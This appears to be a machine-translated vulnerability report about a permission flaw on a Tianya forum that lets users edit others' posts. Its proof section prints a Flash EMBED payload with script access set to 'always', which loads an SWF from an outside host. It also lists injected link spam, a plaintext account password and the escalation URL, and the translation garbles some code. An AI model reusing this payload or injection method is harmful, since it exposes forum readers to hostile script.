Attackers can edit others' POST Vulnerabilities, implant malicious code defects, and fix such vulnerabilities.

Brief description:
An excessive permission vulnerability exists in a forum of Tianya. You can modify any popular post content and embed malicious code in it.
Detailed description:

 

Proof of vulnerability:
In addition, the blog SWF jump: http://myjink.blog.tianya.cn

The swf code is as follows:
<EMBED
Pluginspage = http://flash.macromedia.com/shockwave/download/index.cgi? P1_Prod_Version = ShockwaveFlash src = http://www.96169.cc/96169.swf width = 111 height = 115 type = application/x-shockwave-flash quality = "high" allowfullscreen = "false" alnetworklowing = "All" allowscRIPtaccESs = "aLWays "wmode =" transparent "> </EMBED>

Tianya question ID: Username: myjink520 password: 2885177

Come on, create ID: 458089 & articleId (Note: You must create and activate it before you can escalate permissions). If you do not activate it, it cannot be operated!
Http://groups.tianya.cn/tribe/showArticle.jsp? GroupId = 458089 & articleId = a5c9626ec2465d29b9c27c1806f2c5fc & fm = 0
Modified post:
The post can also jump to the SWF code:

The swf code is as follows:
<EMBED
Pluginspage = http://flash.macromedia.com/shockwave/download/index.cgi? P1_Prod_Version = ShockwaveFlash src = http://www.96169.cc/96169.swf width = 111 height = 115 type = application/x-shockwave-flash quality = "high" allowfullscreen = "false" alnetworklowing = "All" allowscRIPtaccESs = "aLWays "wmode =" transparent "> </EMBED>

Link!
<A href = "http://www.1.lkdcc.com" rel = nofollow target = _ blank> http://www.1.lkdcc.com </A>
<A href = "http://www.9.10010c.com" rel = nofollow target = _ blank> http://www.9.10010c.com </A>
<A href = "http://www.b392.js.55588.mobi" rel = nofollow target = _ blank> http://www.b392.js.55588.mobi </A>
<A href = "http://www.c0ee.mo.qiasoft.net/" rel = nofollow target = _ blank> http://www.lkdcc.com </A>

 

 

Solution:
Authentication permission filtering code